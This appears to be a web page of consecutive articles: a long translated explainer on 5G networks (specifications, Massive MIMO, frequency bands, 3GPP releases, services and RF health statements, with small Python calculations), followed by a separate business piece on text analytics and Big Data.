  • Radio-interface latency reduced to 0.5 ms (for Ultra-Reliable Low Latency Communication, URLLC) and to 4 ms (for enhanced Mobile Broadband, eMBB).
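These figures can be sanity-checked with basic arithmetic, for instance the time to move a 50 GB file (roughly a Blu-ray disc) at the 5G peak rate versus a typical 4G link; the 100 Mbit/s 4G rate is an assumption for comparison.

```python
# Transfer time for a file at a given link rate. Decimal units are
# used throughout (1 GB = 10^9 bytes, 1 Gbit/s = 10^9 bit/s).
def transfer_seconds(size_gigabytes, rate_gbps):
    bits = size_gigabytes * 8 * 10**9
    return bits / (rate_gbps * 10**9)

t_5g = transfer_seconds(50, 20)   # 20 s at the 20 Gbit/s 5G peak
t_4g = transfer_seconds(50, 0.1)  # about 67 minutes at 100 Mbit/s
```

Note that these are peak radio-interface figures; real throughput per subscriber is shared among users in a cell.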

Potential 5G Technology

1) Massive MIMO
MIMO technology means using multiple antennas on transceivers. Successfully applied in fourth-generation networks, it will also find application in 5G. Moreover, while networks currently use MIMO 2×2 and 4×4, the number of antennas will grow in the future. The technology has two weighty arguments in its favor: 1) the data rate increases almost in proportion to the number of antennas, and 2) signal quality improves when a signal is received by several antennas at once, thanks to receive diversity.
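The near-proportional rate scaling can be illustrated with the textbook Shannon-capacity approximation for an ideal MIMO channel, C ≈ min(Nt, Nr) · B · log2(1 + SNR); this idealization (equal per-stream SNR, perfect channel knowledge) is an assumption, not a model of a real 5G link.

```python
import math

# Idealized MIMO capacity: independent spatial streams, each using the
# full channel bandwidth at the same SNR (a textbook simplification).
def mimo_capacity_bps(n_tx, n_rx, bandwidth_hz, snr_linear):
    streams = min(n_tx, n_rx)
    return streams * bandwidth_hz * math.log2(1 + snr_linear)

b = 20e6    # 20 MHz channel
snr = 100   # 20 dB, expressed as a linear ratio
c_2x2 = mimo_capacity_bps(2, 2, b, snr)  # ~266 Mbit/s
c_4x4 = mimo_capacity_bps(4, 4, b, snr)  # exactly double the 2x2 figure
```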

2) Transition to the centimeter and millimeter ranges: Currently, LTE networks operate in frequency bands below 3.5 GHz. For the full functioning of 5G mobile networks, it is necessary to deploy in the freer, higher-frequency ranges. As the transmission frequency increases, the communication range decreases; this law of physics can be circumvented only by increasing transmitter power, which health regulations limit. However, fifth-generation base stations are expected to be deployed more densely anyway, owing to the need for much greater network capacity. The advantage of the tens-of-GHz bands is the large amount of free spectrum.
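The range penalty of higher bands follows from the free-space path-loss formula, FSPL(dB) = 20·log10(d) + 20·log10(f) + 92.45 with d in km and f in GHz; the sketch below compares a mid-band and a millimeter-wave carrier over the same 1 km path (the two frequencies are illustrative choices).

```python
import math

# Free-space path loss in dB, with distance in km and frequency in GHz.
def fspl_db(distance_km, freq_ghz):
    return 20 * math.log10(distance_km) + 20 * math.log10(freq_ghz) + 92.45

loss_mid = fspl_db(1.0, 3.5)     # ~103.3 dB at 3.5 GHz over 1 km
loss_mmw = fspl_db(1.0, 28.0)    # ~121.4 dB at 28 GHz over the same path
extra_db = loss_mmw - loss_mid   # ~18 dB extra loss for the higher band
```

An 8x jump in frequency costs about 18 dB, which, at fixed transmit power, is recovered in practice by denser base stations and higher-gain beamforming antennas.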

3) Multi-technology
To provide high-quality service, 5G networks must support existing standards such as UMTS, GSM and LTE, as well as others like Wi-Fi. Base stations using Wi-Fi technology can be used to offload traffic in especially busy places.

4) D2D (Device-to-device)
Device-to-device technology allows devices located close to each other to exchange data directly, without the participation of the 5G network, through whose core only signaling traffic will pass. The advantage of this technology is the ability to move data transfer to the unlicensed part of the spectrum, further offloading the network.

5) The new radio interface in 5G networks and other innovations.

What will 5G mobile networks be?

Technical innovations: virtualization, the radio interface, Massive MIMO, spectrum sharing, new full duplex and more.

Mobile technology has firmly entered our lives and continues to strengthen its position. Mobile networks are operator networks that provide voice and Internet access on one side and serve a diverse range of gadgets, sensors and smart devices on the other: from today's smart trackers to the smart coffee makers, cars and entire cities of the near future.

According to the ten-year rule, each generation of mobile communications is replaced every decade. But even a single standard does not stand still within those 10 years: the fourth generation, for example, spans LTE, LTE-A, WiMAX, 4.5G and others. Going by the rule, 4G has about three to four years of dominance left. At the same time, news about 5G innovations and pre-5G network trials appears ever more frequently, and some vendors and operators have made ambitious statements about deploying them during 2018-2020.

To date, official 5G standards have been formed. Leading players in the global telecommunications market, including Qualcomm, Huawei, Ericsson, Verizon, AT&T and Nokia, are offering their concepts for future networks and testing prototypes.

The key feature announced first for each generation is the data rate. However, it is not the only characteristic. Given the growth of the Internet of Things, the resulting increase in connected devices, and ever-growing traffic volumes, the following requirements are defined for the fifth generation:

  • Network bandwidth over 10 Gbit/s.
  • Support for the simultaneous connection of up to 1 million devices/km².
  • Data-transfer latency of no more than 1 ms.
  • Flexible distribution of the available frequency resource among different services.

Virtualized Architecture 5G

Software-Defined Networks (SDN) can become an effective technology that reduces operators' equipment needs and simplifies infrastructure maintenance. SDN promotes the digital transformation of companies and the transfer of services to the cloud. The fundamental principle of Software-Defined Networking is remote, programmatic control of the network and its data-transmission devices.

In turn, Network Functions Virtualization (NFV) is expected to virtualize the functions of many network elements of mobile operators and implement a “network on demand”: data will be processed and stored in a virtual environment (“in the cloud”), while classic equipment retains the function of carrying user traffic. This approach to fifth-generation networking matches the key trend in wireless connectivity, convergence: the integration of isolated network objects into a single computing complex, which is also important for smart devices exchanging information online.

To build a specific part of the network, operators currently use pre-developed solutions with a fixed set of parameters and specific equipment. Virtualization of 5G and “on-demand” networks will make it possible to pre-provision servers and data centers for operators, i.e. give them a “boxed” solution, significantly reducing the time and financial cost of introducing new services.

Regarding the network architecture in the fifth generation, there are three “clouds” that provide its work:

Access cloud
  • organization of distributed and centralized technologies
  • organization of access systems
  • 5G compatibility with 3G and 4G

Management cloud
  • session management
  • mobility management
  • service quality management

Transport cloud
  • physical data transfer
  • ensuring network reliability and speed
  • load balancing

Improved radio interface for 5G networks

One of the obstacles to launching 5G is the lack of frequency spectrum. It is assumed that in future networks the resource will expand, partly thanks to the millimeter range. The problem of network coverage and accessibility is expected to be solved by targeting subscribers: unlike in previous standards, the network's radio coverage will be adjusted to subscribers' needs.

The spectral efficiency of the fifth-generation radio interface will be tripled; that is, it will carry up to 3 times more data in the same bandwidth. The expected rate is 6 bit/s per Hz.
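A spectral efficiency quoted in bit/s per Hz converts directly to throughput: rate = efficiency × bandwidth. A minimal check, with a 100 MHz carrier chosen as an illustrative channel width:

```python
# Throughput implied by a spectral efficiency over a given channel width.
def throughput_bps(spectral_eff_bps_per_hz, bandwidth_hz):
    return spectral_eff_bps_per_hz * bandwidth_hz

rate = throughput_bps(6, 100e6)  # 6 bit/s/Hz over 100 MHz -> 600 Mbit/s
```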

For example, Huawei proposes the following technical solutions as candidates for the 5G radio interface:

1. SCMA (Sparse Code Multiple Access).
This is a low-cost, code-based method of separating subscribers that does not require delivery confirmation. It works as follows: before transmission over the radio interface, the byte streams of different subscribers sharing one frequency resource are converted into a codeword using a so-called codebook. Signal recovery at the receiving side is also performed using the codebook.

2. F-OFDM (Filtered OFDM).
An enhanced version of OFDM, F-OFDM provides its own parameter set for each task thanks to flexible decomposition into subcarriers, different symbol lengths and a variable cyclic prefix.

3. Polar Codes – a coding technology with sub-quadratic complexity.
A polar code is a linear error-correcting code based on the phenomenon of channel polarization.

Polar codes will improve spectral efficiency, allow decoding of near-linear complexity and significantly increase the achievable data rate.

Related technologies: A number of other technologies are intended to create a more capable and qualitatively different 5G network infrastructure. Among them is Massive MIMO, which allows up to 8 data streams to be transmitted to one subscriber. Massive MIMO is an array of many antennas forming very narrow radiation patterns. Multi-beam technology will improve received signal levels and suppress interference from other subscribers, benefiting network bandwidth and the efficiency of spectrum use.

Prominent directions within the Internet of Things concept are machine-to-machine (M2M) and device-to-device (D2D) interaction. M2M technology enables devices to interact without direct human participation, i.e. to automate processes. Its scope is quite wide: payment terminals, security systems, vehicle-coordination systems. The technology reduces process costs, minimizes dependence on the human factor, and allows rapid response to malfunctioning systems.

5G Specifications: Comparing 4G and 5G

5G mobile communication technology has the following characteristics:

  • Peak speed increased to 20 Gbit/s downlink (i.e., from the base station to the mobile) and up to 10 Gbit/s uplink.
  • Practical per-subscriber speed increased to 100 Mbit/s or more.
  • Spectral efficiency increased 2-5 times: 30 bit/s/Hz downlink and 15 bit/s/Hz uplink.
  • Energy efficiency improved by two orders of magnitude, allowing Internet of Things devices to work for 10 years without recharging the battery.
  • Radio-interface latency reduced to 0.5 ms (for Ultra-Reliable Low Latency Communication, URLLC) and to 4 ms (for enhanced Mobile Broadband, eMBB).
  • Supported speed of subscriber movement increased to 500 km/h.
  • Total number of connected devices increased to 1 million/km².

5G Services

The main services requiring the creation of a new generation of mobile communication networks are as follows:

  • enhanced Mobile Broadband (eMBB),
  • Ultra-Reliable Low Latency Communication (URLLC),
  • massive Machine-Type Communications (mMTC).

The importance of each key 5G capability for the eMBB, URLLC and mMTC usage scenarios is given in the book Mobile Communications Toward 6G. The degree of importance is estimated with three approximate ratings: “high”, “medium” and “low”.

In eMBB scenarios, the following are of high importance:

– practical user data rate,

– traffic per unit area,

– peak data rate,

– mobility,

– energy efficiency,

– spectrum efficiency.

In some URLLC scenarios, low latency is of high importance to ensure that critical safety services work [see ch. 14.7 of the book “Mobile Communications Toward 6G”], as is a high level of mobility for transportation-safety services.

mMTC scenarios are characterized by a high density of connections and the need to keep a large number of devices on the network functioning correctly. For this scenario, low device cost and energy efficiency are the important factors.

Services in 5G networks can also be classified by the content provided to subscribers:

  • Multimedia services: video in 4K and 8K resolution, 3D video, online games, hologram-based services and fully immersive multimedia;
  • Cloud services: file storage, government services, business applications;
  • Virtual Reality (VR) services;
  • Augmented Reality (AR) services: healthcare, military, education, entertainment;
  • Big-data intelligent services for improving business efficiency (business intelligence, BI) as well as operations and network management (network intelligence, NI);
  • Internet of Things (IoT) services based on mass device connection: energy, transport, healthcare, trade, public safety, industry, housing and communal services;
  • Ultra-low-latency services: control of robotic mechanisms, telemedicine, unmanned vehicles, 3D games.

5G Speed

A significant increase in throughput and practical data-transfer speed will require a significant expansion of spectrum use, as well as an extremely high density of connections, which is unattainable for the LTE/LTE-A standards even if they are improved.

Thus, implementing fifth-generation networks, and raising data rates in particular, will require a significant increase in frequency resources, both by refarming the bands operators already hold and by opening new spectrum above 6 GHz; the approaches are detailed in the 5G Frequency Bands section below.

Fifth-generation (5G) mobile networks will be characterized by high speeds (up to 20 Gbit/s downlink and up to 10 Gbit/s uplink).

It is also expected that real speed per subscriber will increase to 100 Mbit / s and more.

These speed increases will be achieved by raising the spectral efficiency of 5G networks 2-5 times compared with fourth-generation networks. This, in turn, will be possible through the following technical solutions:

– Massive MIMO

– Use of the new radio interface, New Radio (NR)

– Wider bandwidth

5G Frequency Bands

At what frequencies will 5G networks operate? The question is especially acute, since implementing fifth-generation networks, and raising data rates in particular, will require a significant increase in frequency resources. Here are the main approaches.

Frequency Refarming
One solution is frequency refarming: changing the radio technology deployed on frequencies already allocated to a telecom operator. For example, launching LTE eNodeBs, in agreement with the regulator, on frequencies allocated to the operator for a 2G or 3G radio network.

Use of unlicensed frequency bands
Within the framework of 5G networks, it is also planned to make active use of unlicensed frequency bands, in particular in the 5 GHz band.

Using high frequency ranges
Nevertheless, a move to higher frequency ranges is considered more promising. The key consideration when choosing frequency bands at the national level (including in the Russian Federation) is to keep 5G deployments harmonized with international standards; this, in turn, requires identifying at the international level frequency bands that are only lightly used nationally.

The International Telecommunication Union (ITU) regulates the use of the radio spectrum globally and regionally; decisions on frequency allocation are made at World Radiocommunication Conferences (WRC). At WRC-15 in 2015, it was decided to allocate bands in the 3.4-3.6 GHz range to mobile broadband services, making them prospective for fifth-generation networks as well. However, this spectrum will not be enough for ultra-fast 5G services; new spectrum is needed in the bands above 6 GHz. Accordingly, WRC-19 in 2019 is expected to allocate additional frequency ranges above 6 GHz for mobile communications.

5G networks are expected to use channel bandwidths from 100 MHz up to several GHz; at carrier frequencies up to 40 GHz, the channel bandwidth must be at least 500 MHz. As the transmission frequency increases, the radius of the cell a base station can serve decreases. Consequently, fifth-generation networks will be deployed on the basis of small cells.
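The frequency/cell-radius trade-off can be illustrated with the standard free-space path loss model, FSPL(dB) = 20 log10(d_km) + 20 log10(f_MHz) + 32.44. The 130 dB link budget below is an illustrative assumption:

```python
import math

def fspl_db(distance_km: float, freq_mhz: float) -> float:
    """Free-space path loss in dB (distance in km, frequency in MHz)."""
    return 20 * math.log10(distance_km) + 20 * math.log10(freq_mhz) + 32.44

def max_range_km(max_loss_db: float, freq_mhz: float) -> float:
    """Distance at which the free-space loss reaches the link budget."""
    return 10 ** ((max_loss_db - 32.44 - 20 * math.log10(freq_mhz)) / 20)

BUDGET_DB = 130.0  # illustrative link budget, not from any specification
for f_mhz in (700, 3500, 28000):  # low band, mid band, mmWave
    print(f"{f_mhz} MHz: ~{max_range_km(BUDGET_DB, f_mhz):.1f} km")
```

In free space the achievable range is inversely proportional to frequency, so moving from 700 MHz to 28 GHz shrinks the radius 40-fold before real-world obstacles make things worse, hence the reliance on small cells.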

The new frequency ranges proposed for the deployment of 5G systems, and the priority bands within them, lie in the ranges 10-40.5 GHz and 40.5-100 GHz.

In 5G NR networks, frequency-division duplexing (FDD) and time-division duplexing (TDD) are used to separate the downlink (DL) and uplink (UL), depending on the band. To improve radio coverage in high-frequency bands, where the signal from the user terminal usually limits the communication range, a Supplementary Uplink carrier in a lower frequency band can also be used.

In 5G NR, the maximum permissible bandwidth of a single radio channel in frequency range FR1 increased from 20 MHz in 4G LTE to 100 MHz. Depending on the subcarrier spacing, an FR1 radio channel can be 5, 10, 15, 20, 25, 30, 35, 40, 50, 60, 70, 80, 90, or 100 MHz wide.
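How channel bandwidth and subcarrier spacing translate into usable resource blocks can be approximated as follows. The 90% spectrum-utilization factor is an illustrative assumption; the exact per-bandwidth resource-block counts are defined in 3GPP specification tables:

```python
# Approximate the number of NR resource blocks that fit in a channel.
# An NR resource block is 12 subcarriers; the 0.9 utilization factor
# (accounting for guard bands) is an illustrative assumption -- exact
# counts per bandwidth/SCS combination come from 3GPP tables.

def approx_resource_blocks(bandwidth_mhz: float, scs_khz: float,
                           utilization: float = 0.9) -> int:
    usable_subcarriers = bandwidth_mhz * 1000 * utilization / scs_khz
    return int(usable_subcarriers // 12)

for scs_khz in (15, 30, 60):
    rbs = approx_resource_blocks(100, scs_khz)
    print(f"100 MHz channel @ {scs_khz} kHz SCS: ~{rbs} resource blocks")
```

Doubling the subcarrier spacing halves the number of resource blocks in the same bandwidth, but each block then spans twice the spectrum, so the total capacity is roughly preserved.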

5G Network Standardization
Standardization of second-, third-, fourth-, and fifth-generation mobile networks is carried out by the 3rd Generation Partnership Project (3GPP).

The initial plan for preparing the 5G specifications was as follows: phase 1 was to be completed by the second half of 2018 (within 3GPP Release 15), and phase 2 by December 2019 (within 3GPP Release 16). However, because a number of operators were interested in accelerating the commercialization of 5G systems, 3GPP decided to shorten the standardization timeline.

Thus, by the end of 2017, work was completed on the specifications for the layer 1 and layer 2 protocols of the 5G radio interface for high-speed applications (working name: New Radio, NR).

Due to the shortened standardization timeline, the 3GPP consortium was forced to reduce the number of options considered and specified.

Release 14 3GPP – research phase: services, requirements, the new radio interface, the new architecture.

Release 15 3GPP – Phase 1: specifications for the urgent implementation and commercialization of the first use cases.

Release 15 3GPP (5G Phase 1) includes the following features:

  • Enhanced Mobile Broadband (eMBB)
  • Ultra-Reliable Low-Latency Communication (URLLC)
  • Bands below 52.6 GHz
  • OFDM-based orthogonal radio interface
  • Non-Standalone (NSA) architecture with the LTE system
  • EPC connectivity
  • Standalone (SA) architecture with the new 5G core
  • Interworking with the LTE system
  • Separation of the control plane and user plane (CP/UP split)
  • Network slicing
  • QoS procedures
  • Session and mobility management
  • Management of service policies and charging
  • Security features
  • IMS and SMS support
  • Interworking with untrusted non-3GPP access networks

Release 16 3GPP (5G Phase 2) includes the following features:

  • Interference suppression
  • 5G SON & Big Data
  • 5G MIMO Enhancements
  • 5G location enhancement
  • 5G Power Consumption Improvement
  • Dual Connectivity Enhancements
  • Device capabilities exchange
  • Dynamic and flexible TDD
  • Non-orthogonal Multiple Access (NOMA)
  • 5G Vehicle to X (V2X)
  • 5G Industrial Internet of Things (IIoT)
  • Integrated Access and Backhaul (IAB)
  • 5G operation in the unlicensed frequency spectrum
  • 5G satellite domain
  • 5G above 52.6 GHz

Thus, 3GPP Release 16 will improve the efficiency of 5G networks and broaden the applications of fifth-generation technologies.

5G For People and For Devices?

Every 10 years, mobile technologies take a revolutionary step into the future, opening up new services and opportunities for people. Another decade is now drawing to a close, and fifth-generation (5G) mobile networks are next in line. What will they give users and telecom operators?

Throughout their history, mobile networks have undergone significant changes, and they continue to evolve today: transmission technologies, the list of services provided to subscribers, and more keep being modernized. To mark the most important transformations, the concept of a "generation" ("G") was introduced.

According to this "ten years" rule, a new generation of mobile communications appears roughly every 10 years: a kind of "mobile revolution".

5G (5th Generation) is the official name of the mobile communications standard that follows the previous generations. It is a new stage in the development of the technology, designed to expand Internet access via radio access networks.

The relevance of launching 5G networks
We list the key trends in the mobile industry today:

  • Mobile Internet access has become more important and more in demand than fixed access;
  • Mobile traffic is forecast to grow fivefold in six years;
  • The existing options for scaling network capacity while maintaining a high quality of service are practically exhausted.

5G networks will combine new and existing radio interfaces and will mark the creation of a unified wireless infrastructure providing the widest range of services. The introduction of new services, alongside the continued use of existing ones, will drive a significant increase in mobile network traffic.

The main factors for increasing traffic should include:

  • Growing consumption of video services and increasing video resolution: by 2024, video will account for 74% of mobile traffic;
  • An increase in the number of devices, from smartphones and tablets to the numerous sensors of the Internet of Things (IoT);
  • Growing intensity of application use;
  • The rising popularity of cloud technologies, i.e. models of online storage of subscriber data on numerous servers distributed across the Internet;
  • Online games and their updates.

Market Expectations from 5G

More than a quarter of users (26%) expect 5G networks to deliver higher speeds than previous-generation networks (Fig. 3). Next, at 13% each, come expectations that 5G networks will offer:

  • Improved network coverage inside and outside buildings;
  • Faster Wi-Fi;
  • Lower prices.

5G network requirements

The main technical requirements for 5G networks are:

  • Peak data rate: 20 Gbit/s downlink (to the subscriber); 10 Gbit/s uplink (from the subscriber)
  • Practical speed per subscriber: 100 Mbit/s – 1 Gbit/s
  • Spectral efficiency: a 2-5x increase compared with LTE-Advanced
  • Subscriber mobility: up to 500 km/h
  • Energy efficiency: a 100x increase compared with LTE-Advanced
  • Latency in the radio interface: up to 0.5 ms (for URLLC) and up to 4 ms (for eMBB)
  • Traffic density: ≥ 10 Mbit/s per sq. m
  • Number of active user terminals: ≥ 1 million per sq. km

These parameters are defined as follows:

  • Peak data rate: the maximum data rate achievable under ideal conditions by a single subscriber terminal (in Gbit/s).
  • Practical speed per subscriber: the data rate available to a subscriber/device throughout the coverage area (in Mbit/s or Gbit/s).
  • Spectral efficiency: the average data throughput per unit of spectrum resource per cell (in bit/s/Hz).
  • Energy efficiency: determined by two aspects: on the network side, the number of information bits transmitted/received from the subscriber per unit of energy consumed in the radio access network (in bit/J); on the terminal side, the number of information bits per unit of energy consumed by the communication module (in bit/J).
  • Latency in the radio interface: the radio network's contribution to the interval between a data packet being sent by the source and received by the recipient (in ms).
  • Subscriber mobility: the maximum speed (in km/h) achievable with a given quality of service (QoS) and seamless handover between radio nodes, which may belong to different layers and/or radio access technologies.
  • Traffic density: the total served traffic rate per unit of geographic area (in Mbit/s per sq. m).
  • Number of active user terminals: the total number of connected or reachable subscriber terminals per unit area (per sq. km).
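To make the traffic-density figure concrete, here is a toy check of whether a dense small cell meets the ≥ 10 Mbit/s per sq. m target. The cell throughput and radius below are assumptions invented for the example:

```python
import math

# Toy check of the 5G traffic-density target (>= 10 Mbit/s per sq. m).
# The cell throughput and radius are assumptions for illustration only.

def traffic_density_mbps_per_m2(cell_throughput_gbps: float,
                                cell_radius_m: float) -> float:
    """Served traffic per unit area for an idealized circular cell."""
    area_m2 = math.pi * cell_radius_m ** 2
    return cell_throughput_gbps * 1000 / area_m2

# A peak-rate small cell (20 Gbit/s) covering a 25 m radius
density = traffic_density_mbps_per_m2(20, 25)
print(f"~{density:.1f} Mbit/s per sq. m")
```

With these assumed numbers the density lands just above 10 Mbit/s per sq. m, which illustrates why the requirement effectively forces very small, very dense cells.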

Key Services in 5G networks
Fifth-generation mobile networks must support a variety of services, which can be grouped into three basic service classes:

  1. Enhanced Mobile Broadband (eMBB);
  2. Massive Machine-Type Communications (mMTC);
  3. Ultra-Reliable Low-Latency Communications (URLLC).

The latter two are especially important in the context of the concept of the Internet of Things (IoT).

The importance of the key features of 5G networks
The importance of each key 5G feature differs across the eMBB, URLLC, and mMTC usage scenarios, and can be rated roughly as "high", "medium", or "low".

For eMBB class services, the following are of primary importance:

  • Practical user data rate;
  • Traffic per unit area;
  • Peak data rate;
  • Mobility;
  • Energy efficiency;
  • Spectrum utilization efficiency.

URLLC services are characterized by:

  • Low latency for mission critical security services.
  • High level of mobility (in the field of transportation safety services).

For mMTC services, the following are of high importance:

  • High connection density;
  • The need to maintain the correct functioning of a large number of devices on the network.

For this class of services, low device cost and device energy efficiency are important.

Services in 5G networks can also be classified by the provided content for subscribers:

  • Multimedia services: 4K and 8K video, 3D video, online games, hologram-based services, and fully immersive multimedia;
  • Cloud services: file storage, business applications;
  • Virtual Reality (VR) services;
  • Augmented Reality (AR) services: healthcare, military, education, entertainment;
  • Intelligent services based on Big Data, both for improving business efficiency (business intelligence, BI) and for network operation and management (network intelligence, NI);
  • Internet of Things (IoT) services based on the mass connection of devices: energy, transport, healthcare, retail, public safety, industry, housing and utilities;
  • Ultra-low-latency services: control of robotic mechanisms, telemedicine, unmanned vehicles, 3D games.

The latency and bandwidth requirements of 5G networks depend on the type of service.

5G Network Health Concerns:

Regarding exposure to radio waves, the WHO has standards that mobile operators follow strictly when designing wireless network products that both transmit and receive radio frequency (RF) energy. 5G mobile radio access technologies must comply with the established national and international standards and regulations on RF exposure.

The following WHO statements apply to mobile and wireless network technologies implemented by Nokia:

• WHO’s Fact Sheet 304 extracts:
“From all evidence accumulated so far, no adverse short- or long-term health effects have been shown
to occur from the RF signals produced by base stations.”
“Considering the very low exposure levels and research results collected to date, there is no convincing
scientific evidence that the weak radio frequency signals from base stations and wireless networks
cause adverse health effects.”


• WHO’s Fact Sheet 193 extract: “A large number of studies have been performed over the last two
decades to assess whether mobile phones pose a potential health risk. To date, no adverse health
effects have been established as being caused by mobile phone use.”



5G Network Test Result

The first commercial pilot launches of fifth-generation networks are planned for 2018 as part of the World Cup. Not only federal but also foreign mobile operators and telecommunications equipment manufacturers are taking part in their development.

One of the leaders in 5G development is Huawei. The company tests network prototypes both independently and in partnership with other interested parties. Besides Huawei, 5G is being implemented by Samsung, Qualcomm, and others; in Russia, the federal operators MTS and MegaFon are among the participants.

Nevertheless, despite the many tests, it is too early to expect full-fledged 5G networks in the near future. Operators are exploring the capabilities of next-generation networks and making marketing announcements, but the standardization bodies have yet to resolve many formal issues. The priorities are the specification of the standard by 3GPP and the allocation of frequencies for the new networks. Undoubtedly, the experimental achievements of operators will accelerate this process and help deliver 5G networks as they are expected to be: high-speed, environmentally friendly, reliable, convergent, and universally available.

Secret Methods of Applying Text Analytics (AI and Machine Learning Applications)


Findings of Agent 007 in Text Analysis

According to Deloitte forecasts, 80 of the world's 100 largest software developers will be using cognitive technologies (natural-language text analysis, speech recognition, neural networks, etc.) as early as 2019, 50% more than in 2018.
What if your company is not in the top 100? And what if you understand nothing about text analytics and Big Data technologies? Communication in the Big Data market still resembles a great mystery, where you need to be agent 007 to figure out who plays what role. Almost all market players talk about intelligent data analysis systems, convenient visualization, cloud solutions, machine learning, language detection, and so on.

So what are the differences? What questions should you ask yourself first if you intend to implement Big Data text analytics but do not have a technical background? How exactly can these technologies be applied to your business? Let's figure it out.

What tasks does text analytics solve using Big Data?

The concept of "text analytics" is not as popular as the phrase "Big Data". Yet about 80% of all accumulated information exists as unstructured text, according to a report by International Data Corporation. What should be done with it, and how?

Dmitry Torshin, IT Director for Investment and Vice President of Aplana, is sure: "The use of modern technologies based on text analytics is one of the most important tasks that the heads of growing companies in Russia should set themselves. Their colleagues in developed countries have already done so, and we all use the results, not always even realizing it. The x.ai virtual secretary has already been created to coordinate meetings (it is a program, but it gives away nothing except its mail address: it answers people's questions and suggestions in correspondence perfectly). The App in the Air chat on Facebook Messenger lets me find out, in plain language, what I can and cannot take on a plane in a particular country, and find the flight I need. And the latest version of Apple's desktop operating system, macOS, released just the other day, includes Siri and a search that lets you ask your computer to find 'documents that Petya sent me last week'. People get used to this instantly, and if tomorrow your business cannot communicate with a client in human language just as well, it will be seriously squeezed out by competitors."

Nevertheless, the most common applications of text analytics are found in the advertising market, in banking, and in online retail (where the trend is only emerging, but the benefits are already obvious).

What tasks can be solved by text analytics of unstructured data in advertising and customer service:

– Compiling brand loyalty ratings;
– Increasing CTR by improving the effectiveness of native advertising (matching it to the content of the page where it is placed);
– Content analysis (tagging and classification) to create the next sub-product or adjust the current one;
– Embedding text analysis technologies in chats for community management;
– Automatic recognition of various kinds of entities and frequency analysis of words;
– Monitoring the tonality of brand mentions as an indicator of the company's health;
– Detecting trends at the moment they emerge;
– Improving the effectiveness of loyalty programs (by monitoring not only the public space but also text data from chats, call-center messages, and email).
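As a minimal sketch of the last two ideas (word-frequency analysis and tonality monitoring), here is a toy keyword-based example. The sentiment lexicons and sample mentions are invented for illustration; production systems rely on trained models rather than word lists:

```python
import re
from collections import Counter

# Toy tonality + word-frequency analysis over brand mentions.
# The lexicons and the mentions are invented for illustration;
# real systems use trained sentiment models, not keyword lists.

POSITIVE = {"love", "great", "fast", "helpful"}
NEGATIVE = {"slow", "broken", "awful", "refund"}

def tonality(text: str) -> str:
    words = re.findall(r"[a-z']+", text.lower())
    score = sum(w in POSITIVE for w in words) - sum(w in NEGATIVE for w in words)
    return "positive" if score > 0 else "negative" if score < 0 else "neutral"

mentions = [
    "Love the new app, support was fast and helpful",
    "Checkout is broken again, this is awful",
    "Delivery arrived on time",
]

print([tonality(m) for m in mentions])  # ['positive', 'negative', 'neutral']

# Frequency analysis across all mentions; entity and trend detection
# build on counts like these
all_words = re.findall(r"[a-z']+", " ".join(mentions).lower())
print(Counter(all_words).most_common(3))
```

Even this crude score already separates complaints from praise, which hints at why keyword baselines remain a common first step before investing in machine-learned models.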

Banks are perhaps the leaders in applying analytics to unstructured Big Data. Sergey Dobridnyuk, Director of Research and Innovation at Diasoft Systems, which actively studies the banking sector, says: "My opinion is that trying to structure everything is a dead end. Up to 80% of the daily information 'digitized' by humanity is unstructured, and the reason is the complexity of both the data and the classifier systems. For example, to classify sales receipts for PFM systems, you would need a classifier with at least 1.5 million SKU headings. That is an unrealistically large dictionary in which it is easy to make a mistake: the great Pushkin had a vocabulary of about 30 thousand words. And IT is successfully fighting this complexity: there are hundreds of NoSQL data management systems for which unstructured data is their native element. Algorithms are improving greatly; for example, multilayer neural networks and Bayesian networks find connections and process texts, speech, and images thousands of times faster than 10 years ago. Very high-quality, open-source, free software libraries have appeared, making these technologies available to everyone. The breakthrough technology today is machine learning, where causal relationships are established by a computer on the basis of statistical analysis, and even a person cannot explain the logic, preferring to consider it an unknowable 'black box'. All this matters in order to offer the client comprehensive services based on behavioral models and accumulated customer experience (CX). And the quality of the offer improves continuously thanks to ongoing monitoring of the client and all of his 'digital traces', both structured and unstructured.
The intrigue is that this can be done not only by banks, but also by retailers, telecom operators, and suppliers of services and goods, who already know the client and can offer him financial services no worse than the 'average bank'. Classical banking is therefore in a zone of deep turbulence today, rethinking its activities."

Sergey Zablodsky, director of IBS Data Lab, has no doubts about the practical value of unstructured data analytics: "The question of the applicability of Big Data analytics in business solutions no longer exists today; rather, the task is to do it effectively. And you do not need to look far for examples of effective solutions: look at Uber, Airbnb, Netflix, Walmart, and these are only the names everyone has heard. All of them actively and successfully use Big Data analytics in their business solutions, and for some, the entire business is built on it. For example, the likelihood of commercial success of a series produced by Netflix reaches 70%, while the market average is only 35%."

Where should you start, and what is important to know before implementing text analytics?

The most well-known companies at the intersection of Big Data and linguistics, mainly thanks to high-profile cases and the presence of visualization (an interface), are social media and media monitoring companies (Brand Analytics, Brandwatch, Radian6, Cribrum, etc.). However, the text analytics industry is not limited to them; on the contrary, it is becoming extremely difficult to understand the differences between the solutions on offer.

First of all, when choosing a text analytics solution, you should think for yourself what characteristics are important to you (provided that you have already decided that you will use text analysis technologies to solve a specific business problem).

Answer the questions below:

1. Do you really have big data or not? Is much of it really unstructured?
2. What is more important for you: depth of analysis or speed?
3. In what languages do you need to analyze texts? Each solution on the market has its own technical features of text analysis and language detection. All international corporate machine-learning solutions work perfectly with English, but Russian presents many problems. A rich and powerful language, so to speak!
4. Are you ready to export data?
5. In general, do you want a technology or a finished highly specialized product?
6. Do you need data collection or just text analysis of big data, or both?
7. Do you fundamentally need a solution deployed inside your internal network, or is a cloud-based solution accessed via a REST API acceptable?
8. Do you have the resources to visualize the analyzed data?
9. Which of the main areas of text analytics do you need: search (information search methods) or descriptive / predictive analytics (text mining and tonality determination)?
10. Do you need to extract commercially useful knowledge from text online?
11. Do you have professionals in the team who are able to correctly interpret the result of the analysis, introduce the technology, create a product, or do you expect this from the technology supplier?
12. Finally, what budget are you willing to invest in such solutions? Bear in mind that the maximum benefit from big data analysis comes from long-term analysis (that is, from evaluating analysis results over time), which implies a subscription model rather than a one-off project.

Who has what method?

So, you were more or less able to answer the questions listed above. The next step is choosing a partner. Unstructured information analysis solutions can be conditionally divided into 3 types:

– Finished products based on text analytics technologies: not for a mass audience, and therefore quite expensive and tailored to a specific segment of B2B clients.
– Point solutions: products at the junction of text analytics and big data for the mass-market segment of B2B, so to speak: simpler to implement and designed for different B2B segments.
– Modular text analytics technologies: perhaps the most flexible to implement and suitable for a wide range of tasks, a kind of Lego brick in the text-analytics construction kit for business.

